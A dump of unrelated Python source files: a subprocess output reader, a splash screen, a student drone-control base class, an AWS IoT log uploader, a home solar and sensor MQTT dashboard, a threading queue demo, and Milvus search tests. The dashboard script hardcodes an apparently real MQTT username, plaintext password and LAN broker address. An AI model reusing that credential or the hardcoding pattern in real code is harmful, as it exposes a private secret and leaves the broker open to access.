the most responsive and proper executor. If the user specifies any kwargs
that should be sent to Popen, then they can override these settings.
This subprocess will start as the class is initialized and the class will
start a background thread that continually reads the output from the
executor. This way, if the user wants to read the output, we can simply
check to see if the background thread has done anything by timing out this
main thread and allowing the background thread to do its job. This also
allows users to time out any read request if they just want to check
whether there is any output.
This class also provides other interactive means to communicate with the
subprocess such as sending input and terminating.
'''
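# Minimal usage sketch (the command below is only an example):
#     executor = ConsoleExecutor(["ping", "-c", "3", "localhost"])
#     while True:
#         line = executor.read_output()
#         if line is None:
#             break
#         print(line, end="")
#     executor.close()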
def __init__(self, cmd, **kwargs):
self._cmd = cmd
if(kwargs):
self.__popen = Popen(cmd, stdout=PIPE, stderr=STDOUT, stdin=PIPE, **kwargs)
else:
self.__popen = Popen(cmd, stdout=PIPE, stderr=STDOUT, stdin=PIPE, universal_newlines=True, shell=False,
start_new_session=True)
self.__queue = Queue()
self.__bg_worker = Thread(target=ConsoleExecutor.__file_reader, args=(self.__queue, self.__popen.stdout),
daemon=True)
self.__bg_worker.start()
self._alive = True
@property
def cmd(self):
'''
Command linked to this executor.
:getter: (str) Command that is being executed.
'''
return self._cmd
@property
def returncode(self):
'''
Exit code from the subprocess. Only set once the subprocess has exited.
:getter: (int) any exit code from process
'''
return self.__popen.returncode
@property
def alive(self):
'''
Determines if the subprocess is still alive or not. The background
thread used to read in any output from the subprocess will have exited
once the subprocess has completed.
:getter: (bool) True if the subprocess is still alive. False if it has
completed or otherwise exited.
'''
return self.__bg_worker.is_alive()
@property
def empty(self):
'''
Determines if there is no more output left in the bg executor.
:getter: (bool) True if no more output. False otherwise
'''
return self.__queue.empty()
def read_output(self, timeout=None):
'''
Reads the next output from the subprocess. The output only becomes
available once the subprocess has flushed its stdout or stderr.
By default, this method will poll forever until the subprocess has
passed any output. Users can define timeout to wait only a specific
amount of time for the next output.
:param timeout: Amount of time in seconds to wait for the next output.
:type timeout: int
:returns: Output read from the subprocess. This value will be None if
the subprocess has exited.
:raises ConsoleExecTimeout: If the user specifies a non-None/non-negative
timeout and the subprocess has not responded in time.
'''
if(not(self.__queue.empty())):
return self.__queue.get()
while(True):
if(self.alive):
self.__poll_queue(timeout=timeout, exception=ConsoleExecTimeout)
if(self.__queue.empty()):
if(not(self.alive)):
self.__popen.wait()
if(not(self.__queue.empty())):
return self.__queue.get()
return None
else:
return self.__queue.get() # should never halt here...
else:
self.__popen.wait()
if(not(self.__queue.empty())):
return self.__queue.get()
return None
def send_input(self, value, new_line=True):
'''
Allows users to send input to the subprocess. This input will be flushed
into the subprocess to ensure that the input will be read. To achieve
this, this method will automatically add an extra new line if the user
hasn't specified one. This automatic behavior can be disabled via the
optional new_line parameter.
:param value: Message to send to the subprocess.
:type value: str
:param new_line: True if method should add a new line if missing. False
to ignore this feature.
:type new_line: bool
'''
if(self.alive):
self.__popen.stdin.write(value + "\n" if new_line and not value.endswith("\n") else value)
self.__popen.stdin.flush()
def kill(self):
'''
Terminates the subprocess and waits for it to exit gracefully. Currently
this will not stop any child processes spawned by our subprocess.
'''
self.__popen.terminate()
self.__popen.wait()
def close(self):
'''
Closes off any FDs open by this class to properly clear any memory used
by this subprocess. Terminates subprocess if alive.
'''
if(self.alive):
self.kill()
self.__bg_worker.join()
self.__popen.wait()
self.__popen.stdin.close()
self.__popen.stdout.close()
@timeout(name="Polling Subprocess")
def __poll_queue(self, **kwargs):
while(self.__queue.empty() and self.__bg_worker.is_alive()):
yield None
@staticmethod
def __file_reader(queue, file):
for line in iter(file.readline, b'' or ''):
queue.put(line)
file.close()
|
splash.py
|
import time
import tkinter as tk
from multiprocessing import Process
from PIL import Image, ImageTk
from fishy.helper import helper
from fishy.helper.config import config
def show(win_loc):
dim = (300, 200)
top = tk.Tk()
top.overrideredirect(True)
top.lift()
top.title("Loading...")
top.resizable(False, False)
top.iconbitmap(helper.manifest_file('icon.ico'))
canvas = tk.Canvas(top, width=dim[0], height=dim[1], bg='white')
canvas.pack()
top.image = Image.open(helper.manifest_file('fishybot_logo.png')).resize(dim)
top.image = ImageTk.PhotoImage(top.image)
canvas.create_image(0, 0, anchor=tk.NW, image=top.image)
# Position splash at the center of the main window
default_loc = "{}x{}+0+0".format(top.winfo_reqwidth(), top.winfo_reqheight())
loc = (win_loc or default_loc).split("+")[1:]
top.geometry("{}x{}+{}+{}".format(dim[0], dim[1], int(loc[0]) + int(dim[0] / 2), int(loc[1]) + int(dim[1] / 2)))
top.update()
time.sleep(3)
top.destroy()
def start():
Process(target=show, args=(config.get("win_loc"),)).start()
|
student_base.py
|
##################################################################
# Copyright 2021 Lockheed Martin Corporation. #
# Use of this software is subject to the BSD 3-Clause License. #
##################################################################
# Student flight control base class
#
# This class does the following:
# - receives aircraft data from MavLink
# - forwards that data directly to the Visualization system for display
# - also forwards that data to the student's derived class
# - defines methods that the student's derived class can call to tell the drone to do things
#
# The visualization communications, MavLink communications, and student code all run in separate threads.
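# A minimal derived class might look like this (illustrative sketch only; the
# class name and waypoint values are made up):
#
#     class my_flight_controller(student_base):
#         def student_run(self, telemetry, commands):
#             self.arm()
#             self.takeoff()
#             self.goto(telemetry['latitude'], telemetry['longitude'] + 0.001, 20)
#             self.land()
#             self.disarm()
#
#     my_flight_controller().run()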
import sys
sys.path.append('Visualizer/')
import time
import grpc
import viz_pb2 as viz_connect
import viz_pb2_grpc as viz_connect_grpc
import threading
import mavsdk
import asyncio
import navpy
from shapely.geometry import shape
import os
import json
import math
class student_base:
def __init__(self):
self.channel = grpc.insecure_channel('localhost:51052')
self.stub = viz_connect_grpc.Momentum22VizStub(self.channel)
self.time = 0
self.msgId = 0
self.in_air_lp = False
self.home_alt = 0
self.telemetry = {}
self.telemetry['altitude'] = 0
self.telemetry['latitude'] = 0
self.telemetry['longitude'] = 0
self.telemetry['in_air'] = False
self.telemetry['water_pct_remaining'] = 0
self.telemetry['fires_pct_remaining'] = 100
self.telemetry['fire_polygons'] = []
self.telemetry['survivors_found'] = 0
self.telemetry['velocity'] = 0
self.commands = {}
self.commands['arm'] = False
self.commands['takeoff'] = False
self.commands['land'] = False
self.commands['disarm'] = False
self.commands['goto'] = False
self.mav_shutdown = False
self.viz_stopping = False
self.viz_thread = None
self.student_thread = None
######### Interface for the Viz Thread ###########
def viz_thread_start(self):
self.viz_thread = threading.Thread(target=self.viz_thread_main, args=(self,))
self.viz_thread.start()
def viz_thread_stop(self):
self.viz_stopping = True
self.viz_thread.join()
######### Implementation for the Viz Thread ###########
def viz_thread_main(self, args):
while not self.viz_stopping:
self.viz_send_updates()
self.viz_read_viz_data()
time.sleep(0.1)
def viz_send_updates(self):
self.time = int(time.time()*1000.0)
if(self.telemetry['in_air']):
self.viz_send_location(self.telemetry['latitude'], self.telemetry['longitude'])
self.viz_send_ground_state(self.telemetry['in_air'])
self.new_data_set = False
def viz_send_location(self, latitude, longitude):
loc = viz_connect.Location(msgId=self.msgId, latitude=latitude, longitude=longitude, time=self.time)
self.msgId += 1
ack = self.stub.SetDroneLocation(loc)
def viz_send_ground_state(self, in_air):
if in_air != self.in_air_lp:
self.in_air_lp = in_air
if in_air:
tn = viz_connect.TakeoffNotification(msgId=self.msgId, isTakenOff=True, time=self.time)
ack = self.stub.SetTakeoffStatus(tn)
if not in_air:
ln = viz_connect.LandingNotification(msgId=self.msgId, isLanded=True, time=self.time)
ack = self.stub.SetLandingStatus(ln)
self.msgId += 1
def viz_read_viz_data(self):
try:
if(os.path.getsize('.temp/sim_data.json') > 15 and os.path.isfile('.temp/sim_data.json')):
with open('.temp/sim_data.json', 'r', encoding='utf-8', errors='ignore') as f:
data = json.load(f)
if ("water_pct_remaining" in data):
self.telemetry['water_pct_remaining'] = data['water_pct_remaining']
if ("fires_pct_remaining" in data):
self.telemetry['fires_pct_remaining'] = data['fires_pct_remaining']
if ("fire_polygons" in data):
self.telemetry['fire_polygons'] = [shape(poly) for poly in data['fire_polygons']]
if ("survivors_found" in data):
self.telemetry['survivors_found'] = data['survivors_found']
except json.decoder.JSONDecodeError:
# print("json error")
pass
######### MAV Interface ###########
def mav_run(self):
asyncio.ensure_future(self.mav_start())
asyncio.get_event_loop().run_forever()
async def mav_start(self):
self.drone = mavsdk.System()
await self.drone.connect()
asyncio.ensure_future(self.mav_in_air(self.drone))
asyncio.ensure_future(self.mav_position(self.drone))
asyncio.ensure_future(self.mav_velocity(self.drone))
asyncio.ensure_future(self.mav_shutdown_watcher())
asyncio.ensure_future(self.mav_command_watcher(self.drone))
def mav_thread_stop(self):
self.mav_shutdown = True
async def mav_shutdown_watcher(self):
while not self.mav_shutdown:
await asyncio.sleep(0.1)
asyncio.get_event_loop().stop()
async def mav_in_air(self, drone):
async for in_air in drone.telemetry.in_air():
self.telemetry['in_air'] = in_air
async def mav_position(self, drone):
async for position in drone.telemetry.position():
self.telemetry['latitude'] = position.latitude_deg
self.telemetry['longitude'] = position.longitude_deg
self.telemetry['altitude'] = position.relative_altitude_m
self.home_alt = position.absolute_altitude_m - position.relative_altitude_m
async def mav_velocity(self, drone):
async for pv in drone.telemetry.position_velocity_ned():
self.telemetry['velocity'] = math.sqrt(pv.velocity.north_m_s**2 + pv.velocity.east_m_s**2)
async def mav_command_watcher(self, drone):
while not self.mav_shutdown:
if self.commands['arm']:
await drone.action.arm()
self.commands['arm'] = False
if self.commands['disarm']:
await drone.action.disarm()
self.commands['disarm'] = False
if self.commands['takeoff']:
await drone.action.takeoff()
self.commands['takeoff'] = False
if self.commands['land']:
await drone.action.land()
self.commands['land'] = False
if self.commands['goto']:
lat, lon, alt = self.commands['goto']
await drone.action.goto_location(lat, lon, alt + self.home_alt, 0)
self.commands['goto'] = False
await asyncio.sleep(0.01)
########## Student Thread Interface ############
def student_thread_start(self):
self.student_thread = threading.Thread(target=self.student_thread_main, args=(self,))
self.student_thread.start()
def student_thread_wait_for_stop(self):
self.student_thread.join()
def student_thread_main(self, args):
time.sleep(1)
self.student_run(self.telemetry, self.commands)
self.mav_thread_stop()
def student_run(self, telemetry, commands):
print("Override this method in your class!")
############# Student Commands ###############
def arm(self):
self.commands['arm'] = True
while self.commands['arm']:
time.sleep(0.01)
def disarm(self):
self.commands['disarm'] = True
while self.commands['disarm']:
time.sleep(0.01)
def takeoff(self):
self.commands['takeoff'] = True
while self.commands['takeoff']:
time.sleep(0.01)
def land(self):
self.commands['land'] = True
while self.commands['land']:
time.sleep(0.01)
def goto(self, lat, lon, alt):
self.commands['goto'] = (lat, lon, alt)
while self.commands['goto']:
time.sleep(0.01)
########## Main ############
def run(self):
self.viz_thread_start()
self.student_thread_start()
self.mav_run()
self.student_thread_wait_for_stop()
self.viz_thread_stop()
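# Example usage (hypothetical sketch, not part of the original assignment code): a student
# class subclasses student_base and overrides student_run(), which receives the shared
# telemetry dict and can call the blocking command helpers defined above.
#
#   class ExampleStudent(student_base):
#       def student_run(self, telemetry, commands):
#           self.arm()                      # each helper blocks until the MAV thread clears the flag
#           self.takeoff()
#           self.goto(47.3977, 8.5456, 20)  # hypothetical latitude/longitude/altitude values
#           while abs(telemetry['latitude'] - 47.3977) > 1e-5:
#               time.sleep(0.5)             # poll telemetry until the drone is near the target
#           self.land()
#
#   ExampleStudent().run()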
if __name__ == "__main__":
print("This script can't be run directly. Create a class that inherits student_base, and run that instead.")
|
logger.py
|
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: MIT-0
import threading
import json
import logging
import app.util as util
IOT_BASE_TOPIC = 'edge-manager-app'
class Logger(object):
def __init__(self, device_name, iot_params):
'''
This class is responsible for sending application logs
to the cloud via MQTT and IoT Topics
'''
self.device_name = device_name
logging.info("Device Name: %s" % self.device_name)
self.iot_params = iot_params
self.__update_credentials()
self.logs_buffer = []
self.__log_lock = threading.Lock()
def __update_credentials(self):
'''
Get new temp credentials
'''
logging.info("Getting the IoT Credentials")
self.iot_data_client = util.get_client('iot-data', self.iot_params)
def __run_logs_upload_job__(self):
'''
Launch a thread that reads the logs buffer,
prepares a JSON document, and sends the logs
'''
self.cloud_log_sync_job = threading.Thread(target=self.__upload_logs__)
self.cloud_log_sync_job.start()
def __upload_logs__(self):
'''
Invoked by the thread to publish the latest logs
'''
self.__log_lock.acquire(True)
f = json.dumps({'logs': self.logs_buffer})
self.logs_buffer = [] # clean the buffer
try:
self.iot_data_client.publish( topic='%s/logs/%s' % (IOT_BASE_TOPIC, self.device_name), payload=f.encode('utf-8') )
except Exception as e:
logging.error(e)
self.__update_credentials()
self.iot_data_client.publish( topic='%s/logs/%s' % (IOT_BASE_TOPIC, self.device_name), payload=f.encode('utf-8') )
logging.info("New log file uploaded. len: %d" % len(f))
self.__log_lock.release()
def publish_logs(self, data):
'''
Invoked by the application, it buffers the logs
'''
buffer_len = 0
if self.__log_lock.acquire(False):
self.logs_buffer.append(data)
buffer_len = len(self.logs_buffer)
self.__log_lock.release()
# else: job is running, discard the new data
if buffer_len > 10:
# run the sync job
self.__run_logs_upload_job__()
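# Example usage (hypothetical sketch): assuming iot_params holds credentials accepted by
# app.util.get_client, an application buffers records via publish_logs(); once more than
# 10 records are buffered, a background thread publishes them as a single JSON document
# to '<IOT_BASE_TOPIC>/logs/<device_name>'.
#
#   logger = Logger(device_name='edge-device-01', iot_params=iot_params)
#   for i in range(20):
#       logger.publish_logs({'seq': i, 'msg': 'inference done'})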
|
HomeDisplay.py
|
# pv display for Pi0 using python3 and PySimpleGUI
import time
from time import ctime
from datetime import datetime
import pytz
import json
import paho.mqtt.client as mqtt
import threading
PVB_Vin = ' 00.0'
PVB_Vout = ' 00.0'
PVB_Iin = ' 00.00'
PVB_Iout = ' 00.00'
S2_temp = ' 00.0'
S2_hum = ' 00.0'
S2_atmp = ' 0000.0'
S2_vols = ' 000.0'
S3_temp = ' 00.0'
S3_hum = ' 00.0'
S3_atmp = ' 0000.0'
S4_temp = ' 00.0'
S4_hum = ' 00.0'
PM25 = ' 000.0'
PM10 = ' 000.0'
Msg = ' '
ptz = pytz.timezone('America/Los_Angeles')
utc = pytz.timezone('UTC')
now = utc.localize(datetime.utcnow())
Time = str(now.astimezone(ptz))[:-13]
import PySimpleGUI as sg
sg.theme('DarkAmber') # Add a little color to your windows
sg.set_options(font=('Helvetica', 14))
#
layout = [ [sg.Text(Time, key='-time-')],
[sg.Text('PvB Vi/o:'), sg.Text(PVB_Vin, key='-PVB_Vin-'),
sg.Text('/'), sg.Text(PVB_Vout, key='-PVB_Vout-'),
sg.Text(' Ii/o:'), sg.Text(PVB_Iin, key='-PVB_Iin-'),
sg.Text('/'), sg.Text(PVB_Iout, key='-PVB_Iout-')],
[sg.Text('S2 T:'), sg.Text(S2_temp, key='-S2_temp-'),
sg.Text(' H:'), sg.Text(S2_hum, key='-S2_hum-'),
sg.Text(' P:'), sg.Text(S2_atmp, key='-S2_atmp-'),
sg.Text(' V:'), sg.Text(S2_vols, key='-S2_vols-')],
[sg.Text('S3 T:'), sg.Text(S3_temp, key='-S3_temp-'),
sg.Text(' H:'), sg.Text(S3_hum, key='-S3_hum-'),
sg.Text(' P:'), sg.Text(S3_atmp, key='-S3_atmp-')],
[sg.Text('S4 T:'), sg.Text(S4_temp, key='-S4_temp-'),
sg.Text(' H:'), sg.Text(S4_hum, key='-S4_hum-')],
[sg.Text('PM2.5:'), sg.Text(PM25, key='-PM25-'),
sg.Text(' PM10:'), sg.Text(PM10, key='-PM10-')],
[sg.Button('0', key='-SP100-'), sg.Text(' '),
sg.Button('1', key='-SP101-'), sg.Text(' '),
sg.Button('2', key='-SP102-'), sg.Text(' '),
sg.Button('3', key='-SP103-')]
]
# Create the Window
window = sg.Window('PV Monitor', layout, no_titlebar=False)
def new_measurement(client, userdata, msg):
#print (msg.topic, msg.payload)
now = utc.localize(datetime.utcnow())
Time = str(now.astimezone(ptz))[:-13]
topic = msg.topic
if 'pv/battery' in topic:
try:
measurement = json.loads(msg.payload)
except:
return
#print(topic, measurement)
window['-time-'].update(Time)
if 'output' in topic:
if 'current' in topic:
PVB_Iout = " {0:5.2f}".format(measurement)
window['-PVB_Iout-'].update(PVB_Iout)
else:
PVB_Vout = " {0:5.2f}".format(measurement)
window['-PVB_Vout-'].update(PVB_Vout)
elif 'input' in topic:
if 'current' in topic:
PVB_Iin = " {0:5.2f}".format(measurement)
window['-PVB_Iin-'].update(PVB_Iin)
else:
PVB_Vin = " {0:5.2f}".format(measurement)
window['-PVB_Vin-'].update(PVB_Vin)
elif 'home' in topic:
tags = topic.split('/')
measure = tags[2]
try:
measurement = json.loads(msg.payload)
except:
return
value = measurement['value']
if tags[1] == 'sensor2':
if measure == 'tmp':
S2_temp = " {0:5.2f}".format(value*9/5+32)
window['-S2_temp-'].update(S2_temp)
elif measure == 'hum':
S2_hum = " {0:5.2f}".format(value)
window['-S2_hum-'].update(S2_hum)
elif measure == 'atmp':
S2_atmp = " {0:5.1f}".format(value)
window['-S2_atmp-'].update(S2_atmp)
elif measure == 'vols':
S2_vols = " {0:5.1f}".format(value/1000.0)
window['-S2_vols-'].update(S2_vols)
if tags[1] == 'sensor3':
if measure == 'tmp':
S3_temp = " {0:5.2f}".format(value*9/5+32)
window['-S3_temp-'].update(S3_temp)
elif measure == 'hum':
S3_hum = " {0:5.1f}".format(value)
window['-S3_hum-'].update(S3_hum)
elif measure == 'atmp':
S3_atmp = " {0:5.1f}".format(value)
window['-S3_atmp-'].update(S3_atmp)
if tags[1] == 'sensor4':
if measure == 'tmp':
S4_temp = " {0:5.2f}".format(value*9/5+32)
window['-S4_temp-'].update(S4_temp)
elif measure == 'hum':
S4_hum = " {0:5.1f}".format(value)
window['-S4_hum-'].update(S4_hum)
elif topic == 'tele/sds011/SENSOR':
try:
measurement = json.loads(msg.payload)
except:
return
pm25_val = measurement['SDS0X1']['PM2.5']
pm10_val = measurement['SDS0X1']['PM10']
PM25= " {0:6.1f}".format(pm25_val)
window['-PM25-'].update(PM25)
PM10 = " {0:6.1f}".format(pm10_val)
window['-PM10-'].update(PM10)
elif 'stat/SP10' in topic:
start = topic.index("SP10")
id = topic[start:start+5]
#print(topic, id, msg.payload)
if 'POWER' in topic:
try:
status = msg.payload
if status == b'ON':
window['-'+id+'-'].update(button_color=('black', 'green'))
elif status == b'OFF':
window['-'+id+'-'].update(button_color=('white', 'grey'))
except:
print("failure reading/setting button status")
return
else:
print('unknown: ', topic)
def subscribe(client):
client.subscribe('pv/battery/output/voltage')
client.subscribe("pv/battery/output/current")
client.subscribe('pv/battery/input/voltage')
client.subscribe("pv/battery/input/current")
client.subscribe('home/#')
client.subscribe('tele/sds011/#')
client.subscribe('stat/SP101/#')
client.subscribe('stat/SP102/#')
client.subscribe('stat/SP103/#')
client.subscribe('stat/SP104/#')
# start mqtt client
def on_connect(client, userdata, flags, rc):
if rc == 0:
subscribe(client)
#window['-msg-'].update("MQTT connected")
print("MQTT connect success")
else:
print(f"MQTT connect fail with code {rc}")
def on_disconnect(client, userdata, rc):
#window['-msg-'].update("MQTT connection lost")
connected = False
while connected == False:
try:
client.reconnect()
connected = True
except:
time.sleep(5)  # brief back-off before retrying the broker connection
subscribe(client)
def PSGEvents():
while True:
event, values = window.read()
if event in (sg.WIN_CLOSED, 'Cancel'):
break
if 'SP10' in event:  # button keys look like '-SP100-' .. '-SP103-'
btn_id = int(event[5])
print(event)
if btn_id >= 0 and btn_id < 4:
client.publish('cmnd/SP10'+str(btn_id)+'/POWER', 'OFF')
window.close()
def MQTT_Msgs():
time.sleep(1)
client.loop_start()
time.sleep(1)
while True:
try:
client.publish('cmnd/SP101/Power')
client.publish('cmnd/SP102/Power')
client.publish('cmnd/SP103/Power')
client.publish('cmnd/SP104/Power')
except BaseException as e:
print ("exception asking for SP10x Power status", e)
time.sleep(600) # query every 10 min
t1 = threading.Thread(target=PSGEvents)
t1.start()
time.sleep(4) # allow window to be created
print("New MQT session being set up")
client = mqtt.Client()
client.on_connect = on_connect
client.on_disconnect = on_disconnect
client.on_message = new_measurement
client.username_pw_set(username='mosq', password='1947nw')
client.connect("192.168.1.101", 1883, 60)
t2 = threading.Thread(target=MQTT_Msgs)
t2.start()
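# Message formats this display expects, inferred from the parsing above (payload values
# are illustrative assumptions):
# pv/battery/output/voltage -> 13.8 (bare JSON number)
# home/sensor2/tmp -> {"value": 21.5} (Celsius, converted to Fahrenheit for display)
# tele/sds011/SENSOR -> {"SDS0X1": {"PM2.5": 7.1, "PM10": 12.3}}
# stat/SP101/POWER -> ON or OFF (plain text, recolors the matching button)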
|
queue_test.py
|
#!/usr/bin/env python
"生产者和消费者线程与共享队列进行通信"
import threading
import time
import queue
NUM_CONSUMERS_INT = 2 # number of consumer threads
NUM_PRODUCERS_INT = 4 # number of producer threads
NUM_MESSAGES_INT = 4 # number of messages each producer puts on the queue
STDOUT_MUTEX = threading.Lock() # otherwise printed output from different threads may interleave
DATA_QUEUE = queue.Queue()
EXIT_LISTBOOL = [False for i_int in range(NUM_PRODUCERS_INT)] # per-producer completion flags that tell consumers when to stop
def producer(id_int):
"Producer thread"
for i_message_num_int in range(NUM_MESSAGES_INT):
time.sleep(id_int + 1)
DATA_QUEUE.put(
'[producer id={}, count={}]'.format(id_int, i_message_num_int)
)
EXIT_LISTBOOL[id_int] = True
def consumer(id_int):
"消费者线程"
while not (all(EXIT_LISTBOOL) and DATA_QUEUE.empty()):  # run until every producer is done and the queue is drained
time.sleep(0.1314)
try:
data_str = DATA_QUEUE.get(block=False)
except queue.Empty:
pass
else:
with STDOUT_MUTEX:
print('consumer', id_int, '| got ->', data_str)
def main():
listThread = []
for i_id_int in range(NUM_CONSUMERS_INT):
Thread = threading.Thread(target=consumer, args=(i_id_int,))
listThread.append(Thread)
Thread.start()
for i_id_int in range(NUM_PRODUCERS_INT):
Thread = threading.Thread(target=producer, args=(i_id_int,))
listThread.append(Thread)
Thread.start()
for i_Thread in listThread:
i_Thread.join()
print('Main thread exiting...')
if __name__ == '__main__':
main()
|
test_search.py
|
import time
import pdb
import copy
import logging
from multiprocessing import Pool, Process
import pytest
import numpy as np
from milvus import DataType
from utils import *
from constants import *
uid = "test_search"
nq = 1
epsilon = 0.001
field_name = default_float_vec_field_name
binary_field_name = default_binary_vec_field_name
search_param = {"nprobe": 1}
entity = gen_entities(1, is_normal=True)
entities = gen_entities(default_nb, is_normal=True)
raw_vectors, binary_entities = gen_binary_entities(default_nb)
default_query, default_query_vecs = gen_query_vectors(field_name, entities, default_top_k, nq)
default_binary_query, default_binary_query_vecs = gen_query_vectors(binary_field_name, binary_entities, default_top_k,
nq)
def init_data(connect, collection, nb=3000, partition_tags=None, auto_id=True):
'''
Generate entities and add it in collection
'''
global entities
if nb == 3000:
insert_entities = entities
else:
insert_entities = gen_entities(nb, is_normal=True)
if partition_tags is None:
if auto_id:
ids = connect.insert(collection, insert_entities)
else:
ids = connect.insert(collection, insert_entities, ids=[i for i in range(nb)])
else:
if auto_id:
ids = connect.insert(collection, insert_entities, partition_tag=partition_tags)
else:
ids = connect.insert(collection, insert_entities, ids=[i for i in range(nb)], partition_tag=partition_tags)
connect.flush([collection])
return insert_entities, ids
def init_binary_data(connect, collection, nb=3000, insert=True, partition_tags=None):
'''
Generate entities and add it in collection
'''
ids = []
global binary_entities
global raw_vectors
if nb == 3000:
insert_entities = binary_entities
insert_raw_vectors = raw_vectors
else:
insert_raw_vectors, insert_entities = gen_binary_entities(nb)
if insert is True:
if partition_tags is None:
ids = connect.insert(collection, insert_entities)
else:
ids = connect.insert(collection, insert_entities, partition_tag=partition_tags)
connect.flush([collection])
return insert_raw_vectors, insert_entities, ids
class TestSearchBase:
"""
generate valid create_index params
"""
@pytest.fixture(
scope="function",
params=gen_index()
)
def get_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return copy.deepcopy(request.param)
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_jaccard_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] in binary_support():
return request.param
# else:
# pytest.skip("Skip index Temporary")
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_hamming_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] in binary_support():
return request.param
# else:
# pytest.skip("Skip index Temporary")
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_structure_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] == "FLAT":
return request.param
# else:
# pytest.skip("Skip index Temporary")
"""
generate top-k params
"""
@pytest.fixture(
scope="function",
params=[1, 10]
)
def get_top_k(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=[1, 10, 1100]
)
def get_nq(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_search_flat(self, connect, collection, get_top_k, get_nq):
'''
target: test basic search function, all the search params are correct, change top-k value
method: search with the given vectors, check the result
expected: the length of the result is top_k
'''
top_k = get_top_k
nq = get_nq
entities, ids = init_data(connect, collection)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq)
if top_k <= max_top_k:
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res[0]) == top_k
assert res[0]._distances[0] <= epsilon
assert check_id_result(res[0], ids[0])
else:
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
def test_search_flat_top_k(self, connect, collection, get_nq):
'''
target: test basic search function, all the search params are correct, change top-k value
method: search with the given vectors, check the result
expected: the length of the result is top_k
'''
top_k = 16385
nq = get_nq
entities, ids = init_data(connect, collection)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq)
if top_k <= max_top_k:
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res[0]) == top_k
assert res[0]._distances[0] <= epsilon
assert check_id_result(res[0], ids[0])
else:
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.skip("r0.3-test")
def _test_search_field(self, connect, collection, get_top_k, get_nq):
'''
target: test basic search function, all the search params are correct, change top-k value
method: search with the given vectors, check the result
expected: the length of the result is top_k
'''
top_k = get_top_k
nq = get_nq
entities, ids = init_data(connect, collection)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq)
if top_k <= max_top_k:
connect.load_collection(collection)
res = connect.search(collection, query, fields=["float_vector"])
assert len(res[0]) == top_k
assert res[0]._distances[0] <= epsilon
assert check_id_result(res[0], ids[0])
res = connect.search(collection, query, fields=["float"])
for i in range(nq):
assert entities[1]["values"][:nq][i] in [r.entity.get('float') for r in res[i]]
else:
with pytest.raises(Exception):
connect.search(collection, query)
def _test_search_after_delete(self, connect, collection, get_top_k, get_nq):
'''
target: test basic search function before and after deletion, all the search params are
correct, change top-k value.
check issue #4200 (https://github.com/milvus-io/milvus/issues/4200)
method: search with the given vectors, check the result
expected: the deleted entities do not exist in the result.
'''
top_k = get_top_k
nq = get_nq
entities, ids = init_data(connect, collection, nb=10000)
first_int64_value = entities[0]["values"][0]
first_vector = entities[2]["values"][0]
search_param = get_search_param("FLAT")
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, search_params=search_param)
vecs[:] = []
vecs.append(first_vector)
res = None
if top_k > max_top_k:
with pytest.raises(Exception):
connect.search(collection, query, fields=['int64'])
# pytest.skip("top_k value is larger than max_topp_k")
pass
else:
res = connect.search(collection, query, fields=['int64'])
assert len(res) == 1
assert len(res[0]) >= top_k
assert res[0][0].id == ids[0]
assert res[0][0].entity.get("int64") == first_int64_value
assert res[0]._distances[0] < epsilon
assert check_id_result(res[0], ids[0])
connect.delete_entity_by_id(collection, ids[:1])
connect.flush([collection])
res2 = connect.search(collection, query, fields=['int64'])
assert len(res2) == 1
assert len(res2[0]) >= top_k
assert res2[0][0].id != ids[0]
if top_k > 1:
assert res2[0][0].id == res[0][1].id
assert res2[0][0].entity.get("int64") == res[0][1].entity.get("int64")
@pytest.mark.level(2)
def test_search_after_index(self, connect, collection, get_simple_index, get_top_k, get_nq):
'''
target: test basic search function, all the search params are correct, test all index params, and build
method: search with the given vectors, check the result
expected: the length of the result is top_k
'''
top_k = get_top_k
nq = get_nq
index_type = get_simple_index["index_type"]
if index_type in skip_pq():
pytest.skip("Skip PQ")
entities, ids = init_data(connect, collection)
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, search_params=search_param)
if top_k > max_top_k:
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
else:
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) >= top_k
assert res[0]._distances[0] < epsilon
assert check_id_result(res[0], ids[0])
def test_search_after_index_different_metric_type(self, connect, collection, get_simple_index):
'''
target: test search with different metric_type
method: build index with L2, and search using IP
expected: search ok
'''
search_metric_type = "IP"
index_type = get_simple_index["index_type"]
entities, ids = init_data(connect, collection)
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, default_top_k, nq, metric_type=search_metric_type,
search_params=search_param)
connect.load_collection(collection)
if index_type == "FLAT":
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == default_top_k
assert res[0]._distances[0] > res[0]._distances[default_top_k - 1]
else:
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.level(2)
def test_search_index_empty_partition(self, connect, collection, get_simple_index, get_top_k, get_nq):
'''
target: test basic search function, all the search params are correct, test all index params, and build
method: add vectors into collection, search with the given vectors, check the result
expected: the length of the result is top_k, search collection with partition tag return empty
'''
top_k = get_top_k
nq = get_nq
index_type = get_simple_index["index_type"]
